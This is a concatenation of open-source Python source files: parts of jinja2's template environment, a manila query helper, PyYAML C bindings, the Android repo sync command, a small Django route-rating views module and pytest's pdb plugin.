u'\x00\x00\x00\x00'.encode('iso-8859-15') def write_file(filename, data, mode): if zip: info = ZipInfo(filename) info.external_attr = 0o755 << 16 zip_file.writestr(info, data) else: f = open(os.path.join(target, filename), mode) try: f.write(data) finally: f.close() if zip is not None: from zipfile import ZipFile, ZipInfo, ZIP_DEFLATED, ZIP_STORED zip_file = ZipFile(target, 'w', dict(deflated=ZIP_DEFLATED, stored=ZIP_STORED)[zip]) log_function('Compiling into Zip archive "%s"' % target) else: if not os.path.isdir(target): os.makedirs(target) log_function('Compiling into folder "%s"' % target) try: for name in self.list_templates(extensions, filter_func): source, filename, _ = self.loader.get_source(self, name) try: code = self.compile(source, name, filename, True, True) except TemplateSyntaxError as e: if not ignore_errors: raise log_function('Could not compile "%s": %s' % (name, e)) continue filename = ModuleLoader.get_module_filename(name) if py_compile: c = self._compile(code, encode_filename(filename)) write_file(filename + 'c', py_header + marshal.dumps(c), 'wb') log_function('Byte-compiled "%s" as %s' % (name, filename + 'c')) else: write_file(filename, code, 'w') log_function('Compiled "%s" as %s' % (name, filename)) finally: if zip: zip_file.close() log_function('Finished compiling templates') def list_templates(self, extensions=None, filter_func=None): """Returns a list of templates for this environment. This requires that the loader supports the loader's :meth:`~BaseLoader.list_templates` method. If there are other files in the template folder besides the actual templates, the returned list can be filtered. There are two ways: either `extensions` is set to a list of file extensions for templates, or a `filter_func` can be provided which is a callable that is passed a template name and should return `True` if it should end up in the result list. If the loader does not support that, a :exc:`TypeError` is raised. .. versionadded:: 2.4 """ x = self.loader.list_templates() if extensions is not None: if filter_func is not None: raise TypeError('either extensions or filter_func ' 'can be passed, but not both') filter_func = lambda x: '.' in x and \ x.rsplit('.', 1)[1] in extensions if filter_func is not None: x = ifilter(filter_func, x) return x def handle_exception(self, exc_info=None, rendered=False, source_hint=None): """Exception handling helper. This is used internally to either raise rewritten exceptions or return a rendered traceback for the template. """ global _make_traceback if exc_info is None: exc_info = sys.exc_info() # the debugging module is imported when it's used for the first time. # we're doing a lot of stuff there and for applications that do not # get any exceptions in template rendering there is no need to load # all of that. if _make_traceback is None: from jinja2.debug import make_traceback as _make_traceback traceback = _make_traceback(exc_info, source_hint) if rendered and self.exception_formatter is not None: return self.exception_formatter(traceback) if self.exception_handler is not None: self.exception_handler(traceback) exc_type, exc_value, tb = traceback.standard_exc_info reraise(exc_type, exc_value, tb) def join_path(self, template, parent): """Join a template with the parent. By default all the lookups are relative to the loader root so this method returns the `template` parameter unchanged, but if the paths should be relative to the parent template, this function can be used to calculate the real template name. Subclasses may override this method and implement template path joining here. """ return template @internalcode def _load_template(self, name, globals): if self.loader is None: raise TypeError('no loader for this environment specified') if self.cache is not None: template = self.cache.get(name) if template is not None and (not self.auto_reload or \ template.is_up_to_date): return template template = self.loader.load(self, name, globals) if self.cache is not None: self.cache[name] = template return template @internalcode def get_template(self, name, parent=None, globals=None): """Load a template from the loader. If a loader is configured this method ask the loader for the template and returns a :class:`Template`. If the `parent` parameter is not `None`, :meth:`join_path` is called to get the real template name before loading. The `globals` parameter can be used to provide template wide globals. These variables are available in the context at render time. If the template does not exist a :exc:`TemplateNotFound` exception is raised. .. versionchanged:: 2.4 If `name` is a :class:`Template` object it is returned from the function unchanged. """ if isinstance(name, Template): return name if parent is not None: name = self.join_path(name, parent) return self._load_template(name, self.make_globals(globals)) @internalcode def select_template(self, names, parent=None, globals=None): """Works like :meth:`get_template` but tries a number of templates before it fails. If it cannot find any of the templates, it will raise a :exc:`TemplatesNotFound` exception. .. versionadded:: 2.3 .. versionchanged:: 2.4 If `names` contains a :class:`Template` object it is returned from the function unchanged. """ if not names: raise TemplatesNotFound(message=u'Tried to select from an empty list ' u'of templates.') globals = self.make_globals(globals) for name in names: if isinstance(name, Template): return name if parent is not None: name = self.join_path(name, parent) try: return self._load_template(name, globals) except TemplateNotFound: pass raise TemplatesNotFound(names) @internalcode def get_or_select_template(self, template_name_or_list, parent=None, globals=None): """Does a typecheck and dispatches to :meth:`select_template` if an iterable of template names is given, otherwise to :meth:`get_template`. .. versionadded:: 2.3 """ if isinstance(template_name_or_list, string_types): return self.get_template(template_name_or_list, parent, globals) elif isinstance(template_name_or_list, Template): return template_name_or_list return self.select_template(template_name_or_list, parent, globals) def from_string(self, source, globals=None, template_class=None): """Load a template from a string. This parses the source given and returns a :class:`Template` object. """ globals = self.make_globals(globals) cls = template_class or self.template_class return cls.from_code(self, self.compile(source), globals, None) def make_globals(self, d): """Return a dict for the globals.""" if not d: return self.globals return dict(self.globals, **d) class Template(object): """The central template object. This class represents a compiled template and is used to evaluate it. Normally the template object is generated from an :class:`Environment` but it also has a constructor that makes it possible to create a template instance directly using the constructor. It takes the same arguments as the environment constructor but it's not possible to specify a loader. Every template object has a few methods and members that are guaranteed to exist. However it's important that a template object should be considered immutable. Modifications on the object are not supported. Template objects created from the constructor rather than an environment do have an `environment` attribute that points to a temporary environment that is probably shared with other templates created with the constructor and compatible settings. >>> template = Template('Hello {{ name }}!') >>> template.render(name='John Doe') u'Hello John Doe!' >>> stream = template.stream(name='John Doe') >>> stream.next() u'Hello John Doe!' >>> stream.next() Traceback (most recent call last): ... StopIteration """ def __new__(cls, source, block_start_string=BLOCK_START_STRING, block_end_string=BLOCK_END_STRING, variable_start_string=VARIABLE_START_STRING, variable_end_string=VARIABLE_END_STRING, comment_start_string=COMMENT_START_STRING, comment_end_string=COMMENT_END_STRING, line_statement_prefix=LINE_STATEMENT_PREFIX, line_comment_prefix=LINE_COMMENT_PREFIX, trim_blocks=TRIM_BLOCKS, lstrip_blocks=LSTRIP_BLOCKS, newline_sequence=NEWLINE_SEQUENCE, keep_trailing_newline=KEEP_TRAILING_NEWLINE, extensions=(), optimized=True, undefined=Undefined, finalize=None, autoescape=False): env = get_spontaneous_environment( block_start_string, block_end_string, variable_start_string, variable_end_string, comment_start_string, comment_end_string, line_statement_prefix, line_comment_prefix, trim_blocks, lstrip_blocks, newline_sequence, keep_trailing_newline, frozenset(extensions), optimized, undefined, finalize, autoescape, None, 0, False, None) return env.from_string(source, template_class=cls) @classmethod def from_code(cls, environment, code, globals, uptodate=None): """Creates a template object from compiled code and the globals. This is used by the loaders and environment to create a template object. """ namespace = { 'environment': environment, '__file__': code.co_filename } exec(code, namespace) rv = cls._from_namespace(environment, namespace, globals) rv._uptodate = uptodate return rv @classmethod def from_module_dict(cls, environment, module_dict, globals): """Creates a template object from a module. This is used by the module loader to create a template object. .. versionadded:: 2.4 """ return cls._from_namespace(environment, module_dict, globals) @classmethod def _from_namespace(cls, environment, namespace, globals): t = object.__new__(cls) t.environment = environment t.globals = globals t.name = namespace['name'] t.filename = namespace['__file__'] t.blocks = namespace['blocks'] # render function and module t.root_render_func = namespace['root'] t._module = None # debug and loader helpers t._debug_info = namespace['debug_info'] t._uptodate = None # store the reference namespace['environment'] = environment namespace['__jinja_template__'] = t return t def render(self, *args, **kwargs): """This method accepts the same arguments as the `dict` constructor: A dict, a dict subclass or some keyword arguments. If no arguments are given the context will be empty. These two calls do the same:: template.render(knights='that say nih') template.render({'knights': 'that say nih'}) This will return the rendered template as unicode string. """ vars = dict(*args, **kwargs) try: return concat(self.root_render_func(self.new_context(vars))) except Exception: exc_info = sys.exc_info() return self.environment.handle_exception(exc_info, True) def stream(self, *args, **kwargs): """Works exactly like :meth:`generate` but returns a :class:`TemplateStream`. """ return TemplateStream(self.generate(*args, **kwargs)) def generate(self, *args, **kwargs): """For very large templates it can be useful to not render the whole template at once but evaluate each statement after another and yield piece for piece. This method basically does exactly that and returns a generator that yields one item after another as unicode strings. It accepts the same arguments as :meth:`render`. """ vars = dict(*args, **kwargs) try: for event in self.root_render_func(self.new_context(vars)): yield event except Exception: exc_info = sys.exc_info() else: return yield self.environment.handle_exception(exc_info, True) def new_context(self, vars=None, shared=False, locals=None): """Create a new :class:`Context` for this template. The vars provided will be passed to the template. Per default the globals are added to the context. If shared is set to `True` the data is passed as it to the context without adding the globals. `locals` can be a dict of local variables for internal usage. """ return new_context(self.environment, self.name, self.blocks, vars, shared, self.globals, locals) def make_module(self, vars=None, shared=False, locals=None): """This method works like the :attr:`module` attribute when called without arguments but it will evaluate the template on every call rather than caching it. It's also possible to provide a dict which is then used as context. The arguments are the same as for the :meth:`new_context` method. """ return TemplateModule(self, self.new_context(vars, shared, locals)) @property def module(self): """The template as module. This is used for imports in the template runtime but is also useful if one wants to access exported template variables from the Python layer: >>> t = Template('{% macro foo() %}42{% endmacro %}23') >>> unicode(t.module) u'23' >>> t.module.foo() u'42' """ if self._module is not None: return self._module self._module = rv = self.make_module() return rv def get_corresponding_lineno(self, lineno): """Return the source line number of a line number in the generated bytecode as they are not in sync. """ for template_line, code_line in reversed(self.debug_info): if code_line <= lineno: return template_line return 1 @property def is_up_to_date(self): """If this variable is `False` there is a newer version available.""" if self._uptodate is None: return True return self._uptodate() @property def debug_info(self): """The debug info mapping.""" return [tuple(imap(int, x.split('='))) for x in self._debug_info.split('&')] def __repr__(self): if self.name is None: name = 'memory:%x' % id(self) else: name = repr(self.name) return '<%s %s>' % (self.__class__.__name__, name) @implements_to_string class TemplateModule(object): """Represents an imported template. All the exported names of the template are available as attributes on this object. Additionally converting it into an unicode- or bytestrings renders the contents. """ def __init__(self, template, context): self._body_stream = list(template.root_render_func(context)) self.__dict__.update(context.get_exported()) self.__name__ = template.name def __html__(self): return Markup(concat(self._body_stream)) def __str__(self): return concat(self._body_stream) def __repr__(self): if self.__name__ is None: name = 'memory:%x' % id(self) else: name = repr(self.__name__) return '<%s %s>' % (self.__class__.__name__, name) class TemplateExpression(object): """The :meth:`jinja2.Environment.compile_expression` method returns an instance of this object. It encapsulates the expression-like access to the template with an expression it wraps. """ def __init__(self, template, undefined_to_none): self._template = template self._undefined_to_none = undefined_to_none def __call__(self, *args, **kwargs): context = self._template.new_context(dict(*args, **kwargs)) consume(self._template.root_render_func(context)) rv = context.vars['result'] if self._undefined_to_none and isinstance(rv, Undefined): rv = None return rv @implements_iterator class TemplateStream(object): """A template stream works pretty much like an ordinary python generator but it can buffer multiple items to reduce the number of total iterations. Per default the output is unbuffered which means that for every unbuffered instruction in the template one unicode string is yielded. If buffering is enabled with a buffer size of 5, five items are combined into a new unicode string. This is mainly useful if you are streaming big templates to a client via WSGI which flushes after each iteration. """ def __init__(self, gen): self._gen = gen self.disable_buffering() def dump(self, fp, encoding=None, errors='strict'): """Dump the complete stream into a file or file-like object. Per default unicode strings are written, if you want to encode before writing specify an `encoding`. Example usage:: Template('Hello {{ name }}!').stream(name='foo').dump('hello.html') """ close = False if isinstance(fp, string_types): fp = open(fp, encoding is None and 'w' or 'wb') close = True try: if encoding is not None: iterable = (x.encode(encoding, errors) for x in self) else: iterable = self if hasattr(fp, 'writelines'): fp.writelines(iterable) else: for item in iterable: fp.write(item) finally: if close: fp.close() def disable_buffering(self): """Disable the output buffering.""" self._next = get_next(self._gen) self.buffered = False def enable_buffering(self, size=5): """Enable buffering. Buffer `size` items before yielding them.""" if size <= 1: raise ValueError('buffer size too small') def generator(next): buf = [] c_size = 0 push = buf.append while 1: try: while c_size < size: c = next() push(c) if c: c_size += 1 except StopIteration: if not c_size: return yield concat(buf) del buf[:] c_size = 0 self.buffered = True self._next = get_next(generator(get_next(self._gen))) def __iter__(self): return self def __next__(self): return self._next() # hook in default template class. if anyone reads this comment: ignore that # it's possible to use custom templates ;-) Environment.template_class = Template
bsd-3-clause
sajuptpm/manila
manila/db/sqlalchemy/query.py
8
1547
# Copyright 2015 Mirantis Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_db.sqlalchemy import orm import sqlalchemy from manila.common import constants class Query(orm.Query): def soft_delete(self, synchronize_session='evaluate', update_status=False, status_field_name='status'): if update_status: setattr(self, status_field_name, constants.STATUS_DELETED) return super(Query, self).soft_delete(synchronize_session) def get_maker(engine, autocommit=True, expire_on_commit=False): """Return a SQLAlchemy sessionmaker using the given engine.""" return sqlalchemy.orm.sessionmaker(bind=engine, class_=orm.Session, autocommit=autocommit, expire_on_commit=expire_on_commit, query_cls=Query) # NOTE(uglide): Monkey patch oslo_db get_maker() function to use custom Query orm.get_maker = get_maker
apache-2.0
lavjain/incubator-hawq
tools/bin/ext/yaml/cyaml.py
125
3233
__all__ = ['CBaseLoader', 'CSafeLoader', 'CLoader', 'CBaseDumper', 'CSafeDumper', 'CDumper'] from _yaml import CParser, CEmitter from constructor import * from serializer import * from representer import * from resolver import * class CBaseLoader(CParser, BaseConstructor, BaseResolver): def __init__(self, stream): CParser.__init__(self, stream) BaseConstructor.__init__(self) BaseResolver.__init__(self) class CSafeLoader(CParser, SafeConstructor, Resolver): def __init__(self, stream): CParser.__init__(self, stream) SafeConstructor.__init__(self) Resolver.__init__(self) class CLoader(CParser, Constructor, Resolver): def __init__(self, stream): CParser.__init__(self, stream) Constructor.__init__(self) Resolver.__init__(self) class CBaseDumper(CEmitter, BaseRepresenter, BaseResolver): def __init__(self, stream, default_style=None, default_flow_style=None, canonical=None, indent=None, width=None, allow_unicode=None, line_break=None, encoding=None, explicit_start=None, explicit_end=None, version=None, tags=None): CEmitter.__init__(self, stream, canonical=canonical, indent=indent, width=width, allow_unicode=allow_unicode, line_break=line_break, explicit_start=explicit_start, explicit_end=explicit_end, version=version, tags=tags) Representer.__init__(self, default_style=default_style, default_flow_style=default_flow_style) Resolver.__init__(self) class CSafeDumper(CEmitter, SafeRepresenter, Resolver): def __init__(self, stream, default_style=None, default_flow_style=None, canonical=None, indent=None, width=None, allow_unicode=None, line_break=None, encoding=None, explicit_start=None, explicit_end=None, version=None, tags=None): CEmitter.__init__(self, stream, canonical=canonical, indent=indent, width=width, allow_unicode=allow_unicode, line_break=line_break, explicit_start=explicit_start, explicit_end=explicit_end, version=version, tags=tags) SafeRepresenter.__init__(self, default_style=default_style, default_flow_style=default_flow_style) Resolver.__init__(self) class CDumper(CEmitter, Serializer, Representer, Resolver): def __init__(self, stream, default_style=None, default_flow_style=None, canonical=None, indent=None, width=None, allow_unicode=None, line_break=None, encoding=None, explicit_start=None, explicit_end=None, version=None, tags=None): CEmitter.__init__(self, stream, canonical=canonical, indent=indent, width=width, allow_unicode=allow_unicode, line_break=line_break, explicit_start=explicit_start, explicit_end=explicit_end, version=version, tags=tags) Representer.__init__(self, default_style=default_style, default_flow_style=default_flow_style) Resolver.__init__(self)
apache-2.0
muzili/repo
subcmds/sync.py
18
14938
# # Copyright (C) 2008 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from optparse import SUPPRESS_HELP import os import re import shutil import socket import subprocess import sys import time import xmlrpclib try: import threading as _threading except ImportError: import dummy_threading as _threading from git_command import GIT from git_refs import R_HEADS from project import HEAD from project import Project from project import RemoteSpec from command import Command, MirrorSafeCommand from error import RepoChangedException, GitError from project import R_HEADS from project import SyncBuffer from progress import Progress class Sync(Command, MirrorSafeCommand): jobs = 1 common = True helpSummary = "Update working tree to the latest revision" helpUsage = """ %prog [<project>...] """ helpDescription = """ The '%prog' command synchronizes local project directories with the remote repositories specified in the manifest. If a local project does not yet exist, it will clone a new local directory from the remote repository and set up tracking branches as specified in the manifest. If the local project already exists, '%prog' will update the remote branches and rebase any new local changes on top of the new remote changes. '%prog' will synchronize all projects listed at the command line. Projects can be specified either by name, or by a relative or absolute path to the project's local directory. If no projects are specified, '%prog' will synchronize all projects listed in the manifest. The -d/--detach option can be used to switch specified projects back to the manifest revision. This option is especially helpful if the project is currently on a topic branch, but the manifest revision is temporarily needed. The -s/--smart-sync option can be used to sync to a known good build as specified by the manifest-server element in the current manifest. The -f/--force-broken option can be used to proceed with syncing other projects if a project sync fails. SSH Connections --------------- If at least one project remote URL uses an SSH connection (ssh://, git+ssh://, or user@host:path syntax) repo will automatically enable the SSH ControlMaster option when connecting to that host. This feature permits other projects in the same '%prog' session to reuse the same SSH tunnel, saving connection setup overheads. To disable this behavior on UNIX platforms, set the GIT_SSH environment variable to 'ssh'. For example: export GIT_SSH=ssh %prog Compatibility ~~~~~~~~~~~~~ This feature is automatically disabled on Windows, due to the lack of UNIX domain socket support. This feature is not compatible with url.insteadof rewrites in the user's ~/.gitconfig. '%prog' is currently not able to perform the rewrite early enough to establish the ControlMaster tunnel. If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or later is required to fix a server side protocol bug. """ def _Options(self, p, show_smart=True): p.add_option('-f', '--force-broken', dest='force_broken', action='store_true', help="continue sync even if a project fails to sync") p.add_option('-l','--local-only', dest='local_only', action='store_true', help="only update working tree, don't fetch") p.add_option('-n','--network-only', dest='network_only', action='store_true', help="fetch only, don't update working tree") p.add_option('-d','--detach', dest='detach_head', action='store_true', help='detach projects back to manifest revision') p.add_option('-q','--quiet', dest='quiet', action='store_true', help='be more quiet') p.add_option('-j','--jobs', dest='jobs', action='store', type='int', help="number of projects to fetch simultaneously") if show_smart: p.add_option('-s', '--smart-sync', dest='smart_sync', action='store_true', help='smart sync using manifest from a known good build') g = p.add_option_group('repo Version options') g.add_option('--no-repo-verify', dest='no_repo_verify', action='store_true', help='do not verify repo source code') g.add_option('--repo-upgraded', dest='repo_upgraded', action='store_true', help=SUPPRESS_HELP) def _FetchHelper(self, opt, project, lock, fetched, pm, sem): if not project.Sync_NetworkHalf(quiet=opt.quiet): print >>sys.stderr, 'error: Cannot fetch %s' % project.name if opt.force_broken: print >>sys.stderr, 'warn: --force-broken, continuing to sync' else: sem.release() sys.exit(1) lock.acquire() fetched.add(project.gitdir) pm.update() lock.release() sem.release() def _Fetch(self, projects, opt): fetched = set() pm = Progress('Fetching projects', len(projects)) if self.jobs == 1: for project in projects: pm.update() if project.Sync_NetworkHalf(quiet=opt.quiet): fetched.add(project.gitdir) else: print >>sys.stderr, 'error: Cannot fetch %s' % project.name if opt.force_broken: print >>sys.stderr, 'warn: --force-broken, continuing to sync' else: sys.exit(1) else: threads = set() lock = _threading.Lock() sem = _threading.Semaphore(self.jobs) for project in projects: sem.acquire() t = _threading.Thread(target = self._FetchHelper, args = (opt, project, lock, fetched, pm, sem)) threads.add(t) t.start() for t in threads: t.join() pm.end() for project in projects: project.bare_git.gc('--auto') return fetched def UpdateProjectList(self): new_project_paths = [] for project in self.manifest.projects.values(): if project.relpath: new_project_paths.append(project.relpath) file_name = 'project.list' file_path = os.path.join(self.manifest.repodir, file_name) old_project_paths = [] if os.path.exists(file_path): fd = open(file_path, 'r') try: old_project_paths = fd.read().split('\n') finally: fd.close() for path in old_project_paths: if not path: continue if path not in new_project_paths: """If the path has already been deleted, we don't need to do it """ if os.path.exists(self.manifest.topdir + '/' + path): project = Project( manifest = self.manifest, name = path, remote = RemoteSpec('origin'), gitdir = os.path.join(self.manifest.topdir, path, '.git'), worktree = os.path.join(self.manifest.topdir, path), relpath = path, revisionExpr = 'HEAD', revisionId = None) if project.IsDirty(): print >>sys.stderr, 'error: Cannot remove project "%s": \ uncommitted changes are present' % project.relpath print >>sys.stderr, ' commit changes, then run sync again' return -1 else: print >>sys.stderr, 'Deleting obsolete path %s' % project.worktree shutil.rmtree(project.worktree) # Try deleting parent subdirs if they are empty dir = os.path.dirname(project.worktree) while dir != self.manifest.topdir: try: os.rmdir(dir) except OSError: break dir = os.path.dirname(dir) new_project_paths.sort() fd = open(file_path, 'w') try: fd.write('\n'.join(new_project_paths)) fd.write('\n') finally: fd.close() return 0 def Execute(self, opt, args): if opt.jobs: self.jobs = opt.jobs if opt.network_only and opt.detach_head: print >>sys.stderr, 'error: cannot combine -n and -d' sys.exit(1) if opt.network_only and opt.local_only: print >>sys.stderr, 'error: cannot combine -n and -l' sys.exit(1) if opt.smart_sync: if not self.manifest.manifest_server: print >>sys.stderr, \ 'error: cannot smart sync: no manifest server defined in manifest' sys.exit(1) try: server = xmlrpclib.Server(self.manifest.manifest_server) p = self.manifest.manifestProject b = p.GetBranch(p.CurrentBranch) branch = b.merge if branch.startswith(R_HEADS): branch = branch[len(R_HEADS):] env = os.environ.copy() if (env.has_key('TARGET_PRODUCT') and env.has_key('TARGET_BUILD_VARIANT')): target = '%s-%s' % (env['TARGET_PRODUCT'], env['TARGET_BUILD_VARIANT']) [success, manifest_str] = server.GetApprovedManifest(branch, target) else: [success, manifest_str] = server.GetApprovedManifest(branch) if success: manifest_name = "smart_sync_override.xml" manifest_path = os.path.join(self.manifest.manifestProject.worktree, manifest_name) try: f = open(manifest_path, 'w') try: f.write(manifest_str) finally: f.close() except IOError: print >>sys.stderr, 'error: cannot write manifest to %s' % \ manifest_path sys.exit(1) self.manifest.Override(manifest_name) else: print >>sys.stderr, 'error: %s' % manifest_str sys.exit(1) except socket.error: print >>sys.stderr, 'error: cannot connect to manifest server %s' % ( self.manifest.manifest_server) sys.exit(1) rp = self.manifest.repoProject rp.PreSync() mp = self.manifest.manifestProject mp.PreSync() if opt.repo_upgraded: _PostRepoUpgrade(self.manifest) if not opt.local_only: mp.Sync_NetworkHalf(quiet=opt.quiet) if mp.HasChanges: syncbuf = SyncBuffer(mp.config) mp.Sync_LocalHalf(syncbuf) if not syncbuf.Finish(): sys.exit(1) self.manifest._Unload() all = self.GetProjects(args, missing_ok=True) if not opt.local_only: to_fetch = [] now = time.time() if (24 * 60 * 60) <= (now - rp.LastFetch): to_fetch.append(rp) to_fetch.extend(all) fetched = self._Fetch(to_fetch, opt) _PostRepoFetch(rp, opt.no_repo_verify) if opt.network_only: # bail out now; the rest touches the working tree return if mp.HasChanges: syncbuf = SyncBuffer(mp.config) mp.Sync_LocalHalf(syncbuf) if not syncbuf.Finish(): sys.exit(1) _ReloadManifest(self) mp = self.manifest.manifestProject all = self.GetProjects(args, missing_ok=True) missing = [] for project in all: if project.gitdir not in fetched: missing.append(project) self._Fetch(missing, opt) if self.manifest.IsMirror: # bail out now, we have no working tree return if self.UpdateProjectList(): sys.exit(1) syncbuf = SyncBuffer(mp.config, detach_head = opt.detach_head) pm = Progress('Syncing work tree', len(all)) for project in all: pm.update() if project.worktree: project.Sync_LocalHalf(syncbuf) pm.end() print >>sys.stderr if not syncbuf.Finish(): sys.exit(1) def _ReloadManifest(cmd): old = cmd.manifest new = cmd.GetManifest(reparse=True) if old.__class__ != new.__class__: print >>sys.stderr, 'NOTICE: manifest format has changed ***' new.Upgrade_Local(old) else: if new.notice: print new.notice def _PostRepoUpgrade(manifest): for project in manifest.projects.values(): if project.Exists: project.PostRepoUpgrade() def _PostRepoFetch(rp, no_repo_verify=False, verbose=False): if rp.HasChanges: print >>sys.stderr, 'info: A new version of repo is available' print >>sys.stderr, '' if no_repo_verify or _VerifyTag(rp): syncbuf = SyncBuffer(rp.config) rp.Sync_LocalHalf(syncbuf) if not syncbuf.Finish(): sys.exit(1) print >>sys.stderr, 'info: Restarting repo with latest version' raise RepoChangedException(['--repo-upgraded']) else: print >>sys.stderr, 'warning: Skipped upgrade to unverified version' else: if verbose: print >>sys.stderr, 'repo version %s is current' % rp.work_git.describe(HEAD) def _VerifyTag(project): gpg_dir = os.path.expanduser('~/.repoconfig/gnupg') if not os.path.exists(gpg_dir): print >>sys.stderr,\ """warning: GnuPG was not available during last "repo init" warning: Cannot automatically authenticate repo.""" return True try: cur = project.bare_git.describe(project.GetRevisionId()) except GitError: cur = None if not cur \ or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur): rev = project.revisionExpr if rev.startswith(R_HEADS): rev = rev[len(R_HEADS):] print >>sys.stderr print >>sys.stderr,\ "warning: project '%s' branch '%s' is not signed" \ % (project.name, rev) return False env = os.environ.copy() env['GIT_DIR'] = project.gitdir.encode() env['GNUPGHOME'] = gpg_dir.encode() cmd = [GIT, 'tag', '-v', cur] proc = subprocess.Popen(cmd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, env = env) out = proc.stdout.read() proc.stdout.close() err = proc.stderr.read() proc.stderr.close() if proc.wait() != 0: print >>sys.stderr print >>sys.stderr, out print >>sys.stderr, err print >>sys.stderr return False return True
apache-2.0
clayshieh/cal_hacks_2015
maps/views.py
1
2868
from django.shortcuts import render from django.core.urlresolvers import reverse from django.http import HttpResponse, HttpResponseRedirect # from userauth.forms import UserForm, UserProfileForm, ForgotForm from maps.models import Report, Route from django.contrib.auth import authenticate, login, logout from django.contrib.auth.decorators import login_required from django.contrib.auth.models import User # Create your views here. def test(request): return HttpResponse('test') def index(request): if request.POST: info = request.POST.get('scoreArray') alat = info[0] alng = info[1] blat = info[2] blng = info[3] qual = request.POST.get('quality') try: rpt = Report() rpt.quality = qual rpt.desc = "" rpt.lat = float(lat) rpt.lng = float(lng) rpt.save() except: return HttpResponse('something went wrong') else: try: route = Route.objects.filter(a_lat=alat).filter(a_lng=alng).filter(b_lat=blat).filter(blng) except: pass return render(request, 'index.html', {}) def slow(request): return render(request, 'index_slow.html', {}) def get_slow(request): if request.POST: alat = request.POST.get("lat1") alng = request.POST.get("lng1") blat = request.POST.get("lat2") blng = request.POST.get("lng2") print alat, alng, blat, blng try: print Route.objects.all() route = Route.objects.filter(a_lat=float(alat)).filter(a_lng=float(alng)).filter(b_lat=float(blat)).filter(b_lng=float(blng)) return HttpResponse(route[0].avg) except Exception as e: return HttpResponse(-1) else: print "2" return HttpResponse(-1) def report(request): if request.POST: a = request.POST.getlist("a[]") b = request.POST.getlist("b[]") alat = a[0] alng = a[1] blat = b[0] blng = b[1] qual = request.POST.get('rating') try: route = Route.objects.filter(a_lat=float(alat)).filter(a_lng=float(alng)).filter(b_lat=float(blat)).filter(b_lng=float(blng)) if len(route) == 0: route = Route() route.a_lat = alat route.a_lng = alng route.b_lat = blat route.b_lng = blng route.avg = qual route.save() return HttpResponse("created") else: route = route[0] if route != None or route != "null": route.avg -= route.avg / 10 route.avg += float(qual) / 10 route.save() return HttpResponse("updated route") except: return HttpResponse(-1) def get(request): if request.POST: result = [] array = request.POST.getlist("dict[]") x = 0 while x < len(array): alat = array[x] alng = array[x+1] blat = array[x+2] blng = array[x+3] x+=4 route = Route.objects.filter(a_lat=float(alat)).filter(a_lng=float(alng)).filter(b_lat=float(blat)).filter(b_lng=float(blng)) if len(route)==0: result.append(-1) else: result.append(route[0].avg) return HttpResponse(str(result)) else: return HttpResponse(-1)
gpl-2.0
zploskey/servo
tests/wpt/css-tests/tools/pytest/_pytest/pdb.py
176
3491
""" interactive debugging with PDB, the Python Debugger. """ from __future__ import absolute_import import pdb import sys import pytest def pytest_addoption(parser): group = parser.getgroup("general") group._addoption('--pdb', action="store_true", dest="usepdb", default=False, help="start the interactive Python debugger on errors.") def pytest_namespace(): return {'set_trace': pytestPDB().set_trace} def pytest_configure(config): if config.getvalue("usepdb"): config.pluginmanager.register(PdbInvoke(), 'pdbinvoke') old = (pdb.set_trace, pytestPDB._pluginmanager) def fin(): pdb.set_trace, pytestPDB._pluginmanager = old pytestPDB._config = None pdb.set_trace = pytest.set_trace pytestPDB._pluginmanager = config.pluginmanager pytestPDB._config = config config._cleanup.append(fin) class pytestPDB: """ Pseudo PDB that defers to the real pdb. """ _pluginmanager = None _config = None def set_trace(self): """ invoke PDB set_trace debugging, dropping any IO capturing. """ import _pytest.config frame = sys._getframe().f_back if self._pluginmanager is not None: capman = self._pluginmanager.getplugin("capturemanager") if capman: capman.suspendcapture(in_=True) tw = _pytest.config.create_terminal_writer(self._config) tw.line() tw.sep(">", "PDB set_trace (IO-capturing turned off)") self._pluginmanager.hook.pytest_enter_pdb(config=self._config) pdb.Pdb().set_trace(frame) class PdbInvoke: def pytest_exception_interact(self, node, call, report): capman = node.config.pluginmanager.getplugin("capturemanager") if capman: out, err = capman.suspendcapture(in_=True) sys.stdout.write(out) sys.stdout.write(err) _enter_pdb(node, call.excinfo, report) def pytest_internalerror(self, excrepr, excinfo): for line in str(excrepr).split("\n"): sys.stderr.write("INTERNALERROR> %s\n" %line) sys.stderr.flush() tb = _postmortem_traceback(excinfo) post_mortem(tb) def _enter_pdb(node, excinfo, rep): # XXX we re-use the TerminalReporter's terminalwriter # because this seems to avoid some encoding related troubles # for not completely clear reasons. tw = node.config.pluginmanager.getplugin("terminalreporter")._tw tw.line() tw.sep(">", "traceback") rep.toterminal(tw) tw.sep(">", "entering PDB") tb = _postmortem_traceback(excinfo) post_mortem(tb) rep._pdbshown = True return rep def _postmortem_traceback(excinfo): # A doctest.UnexpectedException is not useful for post_mortem. # Use the underlying exception instead: from doctest import UnexpectedException if isinstance(excinfo.value, UnexpectedException): return excinfo.value.exc_info[2] else: return excinfo._excinfo[2] def _find_last_non_hidden_frame(stack): i = max(0, len(stack) - 1) while i and stack[i][0].f_locals.get("__tracebackhide__", False): i -= 1 return i def post_mortem(t): class Pdb(pdb.Pdb): def get_stack(self, f, t): stack, i = pdb.Pdb.get_stack(self, f, t) if f is None: i = _find_last_non_hidden_frame(stack) return stack, i p = Pdb() p.reset() p.interaction(None, t)
mpl-2.0
SnappleCap/oh-mainline
vendor/packages/docutils/test/test_parsers/test_rst/test_transitions.py
19
5276
